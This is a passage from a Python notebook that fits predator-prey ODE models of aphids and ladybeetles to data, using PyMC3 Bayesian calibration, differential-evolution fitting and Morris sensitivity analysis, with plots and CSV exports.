    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6  # widened from (1.0 + percent_calibration) * a3
    )
    # Prioris for Initial Conditions
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "LP3_model",
        LP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse dataset 2: every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
# Coarse model 2 at half resolution.
# NOTE(review): defined but never passed to pm.MLDA below -- only
# coarse_model_1 is used; confirm whether this level was meant to be included.
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6  # widened from (1.0 + percent_calibration) * a1
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6  # widened from (1.0 + percent_calibration) * a3
    )
    # Prioris for Initial Conditions
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # note 'shape' here; NOTE(review): lower=0 differs from the other models' lower=1 -- confirm intent
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "LP3_model",
        LP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Multi-Level Delayed Acceptance: one coarse level, 5 coarse subsamples per
# fine-level proposal.
with fine_model_LP3:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_LP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
# Quick look at the marginal posterior of a1.
plt.hist(trace_calibration_LP3['a1'], bins=35)
plt.show()
# In[ ]:
# Variables actually calibrated in the LP3 model (the rest are fixed data).
calibration_variable_names = [
    "std_deviation",
    "a1",
    "a3",
]
# In[ ]:
# Posterior histogram (with mode) for each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_LP3[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_LP3.png")
# In[ ]:
# Pairwise joint posteriors (hexbin) with marginals.
az.plot_pair(
    trace_calibration_LP3,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP3.png")
# In[ ]:
df_stats_summary = az.summary(
    data=trace_calibration_LP3,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the most probable value (KDE mode) for each traced variable.

    Vector-valued variables are decomposed into per-dimension scalar entries
    keyed as ``"name[dim]"``; scalar variables keep their plain name.
    """
    mpv_by_name = dict()
    progress_bar = tqdm(variable_names)
    for variable in progress_bar:
        progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
        realizations = pm_trace[f"{variable}"]
        try:
            num_of_dimensions = realizations.shape[1]
        except IndexError:
            num_of_dimensions = 0
        if num_of_dimensions == 0:
            mpv_by_name[f"{variable}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dimension in range(num_of_dimensions):
                column = np.array(realizations[:, dimension])
                mpv_by_name[f"{variable}[{dimension}]"] = _scalar_rv_mvp_estimation(column)
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of ``arviz_summary`` with an ``mpv`` column attached.

    ``rv_modes_dict`` maps variable names (summary index labels) to their
    most probable values; the input summary is not modified.
    """
    summary_with_mpv = arviz_summary.copy()
    summary_with_mpv["mpv"] = pd.Series(rv_modes_dict)
    return summary_with_mpv
# In[ ]:
# Attach the KDE-based most probable values to the ArviZ summary and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_LP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP3.csv")  # save to CSV for later reference
df_stats_summary
# In[ ]:
# Pointwise posterior percentiles of the simulated trajectories:
# 2.5%/97.5% band plus the median.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP3["LP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP3["LP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP3["LP3_model"], 50, axis=0)
# In[ ]:
# Posterior predictive plot: median trajectories with the 95% credible band,
# against the observed densities.
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP3.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also keep the realizations in a Python dict
# [1:] skips "std_deviation", the first entry of calibration_variable_names.
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_LP3.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR1 model
# ## The parameters r1 and r3 are very close to zero
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP1_model(
    t,
    X,
    r1 = 1,
    r2 = 1,
    r3 = 1,
    a1 = 1,
):
    """RHS of the Allee prey growth FR1 model.

    X = (u, v): u is the aphid (prey) density, v the ladybeetle (predator)
    density. Prey growth is the product of two quadratic factors (Allee-type
    construction) minus linear predation a1*u*v; the predator density is held
    constant (dv/dt = 0).
    """
    u, v = X
    # NOTE(review): r2 appears in both growth factors -- presumably intentional
    # for this Allee formulation; confirm against the model derivation.
    u_prime = ( r1 * u - r2 * u * u ) * ( r2 * u * u - r3 * u ) - a1 * u * v
    v_prime = 0
    return u_prime, v_prime
def AP1_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    r2 = 1,
    r3 = 1,
    a1 = 1,
):
    """Integrate the AP1 predator-prey system with scipy's LSODA.

    ``y0`` is the initial state, ``t_span`` the integration window and
    ``t_eval`` the output times; the remaining arguments are the AP1 model
    coefficients. Returns the scipy solution object.
    """
    return solve_ivp(
        fun=AP1_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, r2, r3, a1),
        method="LSODA",
    )
# Observation window and data series used by the AP1 calibration below.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP1_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between AP1 model output and data.

    ``par`` holds the ODE parameters forwarded to ``fitting_model``; ``f_exp``
    is the pair of observed series (aphids, ladybeetles). A huge penalty is
    returned when the solver raises ValueError, so global optimizers simply
    steer away from pathological parameter sets.
    """
    observed_qoi1, observed_qoi2 = f_exp
    integration_span = (time_exp.min(), time_exp.max())
    weight_qoi1 = 1
    weight_qoi2 = 1
    num_of_qoi = len(f_exp)
    try:
        solution = fitting_model(initial_conditions, integration_span, time_exp, *par)
        simulated_time = solution.t
        simulated_qoi1, simulated_qoi2 = solution.y
        sse_qoi1 = weight_qoi1 * np.sum((observed_qoi1 - simulated_qoi1) ** 2.0)
        sse_qoi2 = weight_qoi2 * np.sum((observed_qoi2 - simulated_qoi2) ** 2.0)
        objective_function = 1 / num_of_qoi * (sse_qoi1 + sse_qoi2)
    except ValueError:
        objective_function = 1e15  # penalty: solver failed for these parameters
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for scipy's differential_evolution.

    Prints the current best parameter vector; the implicit None return lets
    the optimization continue.
    """
    print("parameters = {}\n".format(xk))
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
# Nominal parameter values (from a previous calibration run); the search box
# below spans 10%..190% of each value.
r1=0.00025591841125063587
r2=8.187887886937167e-11
r3=0.03133563264585748
a1=0.003699720734502655
denom_min = 0.1
denom_max = 1.9
bounds_AP1 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ),  # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ),  # r2
    ( ( r3 * denom_min ), ( r3 * denom_max ) ),  # r3
    ( ( a1 * denom_min ), ( a1 * denom_max ) ),  # a1
]
# Global calibration of the AP1 parameters by differential evolution.
result_AP1 = optimize.differential_evolution(
    AP1_least_squares_error_ode,
    bounds=bounds_AP1,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        AP1_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000,  # 2000
    polish=True,  # refine the best member with a local search at the end
    disp=True,
    seed = seed,  # for the sake of reproducibility
    callback=callback_de,
    workers=-1,  # use all available cores
)
print(result_AP1)
# * Retrieving the calibrated parameter values:
# In[ ]:
# Re-solve the AP1 system on a dense grid using the calibrated parameters.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
    r1_deterministic,
    r2_deterministic,
    r3_deterministic,
    a1_deterministic,
) = result_AP1.x
solution_ODE_AP1 = AP1_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_AP1.x
)
t_computed_AP1, y_computed_AP1 = solution_ODE_AP1.t, solution_ODE_AP1.y
u_AP1, v_AP1 = y_computed_AP1
parameters_dict = {
    "Model": "AP1",
    u"$r1$": r1_deterministic,
    u"$r2$": r2_deterministic,
    u"$r3$": r3_deterministic,
    u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
# Calibrated AP1 trajectories plotted against the observations.
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP1, u_AP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP1, v_AP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris screening of the least-squares objective for the AP1 model:
# +/-50% bounds around the nominal parameter values.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    # QoI: the scalar least-squares residual of each Morris sample.
    residual_least_squares_result = AP1_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        AP1_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
# Transpose so parameters become rows, then rank by normalized mu*.
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris problem for the AP1 prey-population QoI (same +/-50% bounds).
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP1 = AP1_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    # QoI: the full prey (aphid) trajectory of each realization.
    u_realization, v_realization = realization_ODE_AP1.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
# One row per time point; parameter columns are filled by the analysis loop below.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris elementary-effects analysis of the AP1 prey population at each time
# point; failed analyses are skipped and their NaN rows dropped below.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize so the indices of all parameters sum to one per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`: keep the deliberate best-effort skip but stop
        # swallowing KeyboardInterrupt/SystemExit.
        continue
# Order chronologically, drop the initial time point and NaN rows, reindex.
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked bar chart of normalized mu* over time (AP1 pest population).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2  # plot every other time point to keep the axis readable
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): tick value used directly as an index into the subsampled time
# array -- assumes integer tick positions; confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP1.png", dpi=300)
plt.show()
# In[ ]:
# Same chart for the normalized sigma indices.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Return du/dt of ``ode_model`` evaluated along the (u, v) trajectory."""
    values = []
    for current_time, u_value, v_value in zip(time_array, u_array, v_array):
        du_dt, _ = ode_model(current_time, [u_value, v_value], *model_pars)
        values.append(du_dt)
    return np.array(values)
# In[ ]:
# Time derivative of the pest population along the fitted AP1 trajectory.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_AP1,
    u_AP1,
    v_AP1,
    AP1_model,
    mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP1, u_AP1, '-x', label='Pest population')
plt.plot(t_computed_AP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP1.png", dpi=300)
plt.show()
# In[ ]:
# Morris problem for the AP1 derivative QoI (+/-50% bounds).
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
# Solve the AP1 system for every Morris sample; the QoI matrix stores du/dt
# along each realization's trajectory.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP1 = AP1_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_AP1.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        AP1_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
# One row per time point; parameter columns are filled by the analysis loop below.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris elementary-effects analysis of the AP1 pest-derivative QoI at each
# time point; failed analyses are skipped and their NaN rows dropped below.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize so the indices of all parameters sum to one per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`: keep the deliberate best-effort skip but stop
        # swallowing KeyboardInterrupt/SystemExit.
        continue
# Order chronologically, drop the initial time point and NaN rows, reindex.
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked bar chart of normalized mu* over time (AP1 pest-derivative QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2  # plot every other time point to keep the axis readable
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): tick value used directly as an index into the subsampled time
# array -- assumes integer tick positions; confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP1.png", dpi=300)
plt.show()
# In[ ]:
# Same chart for the normalized sigma indices.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # evaluation times
        t.dscalar,  # r1
        t.dscalar,  # r2
        t.dscalar,  # r3
        t.dscalar,  # a1
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def AP1_ode_wrapper(time_exp, r1, r2, r3, a1, u0, v0):
    """Theano op wrapping LSODA integration of the AP1 model.

    Returns the solution evaluated at ``time_exp`` as a (len(time_exp), 2)
    matrix with columns (aphids, ladybeetles), matching the observation
    matrix layout used by PyMC3.
    """
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, r2, r3, a1]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        AP1_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack the two state trajectories column-wise to match the data layout.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[ ]:
# Assemble the observation matrix (n_times x 2: aphids, ladybeetles)
# that serves as likelihood data for the Bayesian calibration below.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
# NOTE(review): 'draws' is set here but pm.sample below is called with
# draws=4500 — this variable appears unused; confirm.
draws = 1000
start_time = time.time()
percent_calibration = 0.95
# Fine (full-resolution) model for MLDA sampling.
with pm.Model() as fine_model_AP1:
    # Prior distributions for the model's parameters
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 20 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)  # r2 held fixed at its deterministic value
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + 20 * percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP1_model",
        AP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse level 1 for MLDA: same model, every 4th observation.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
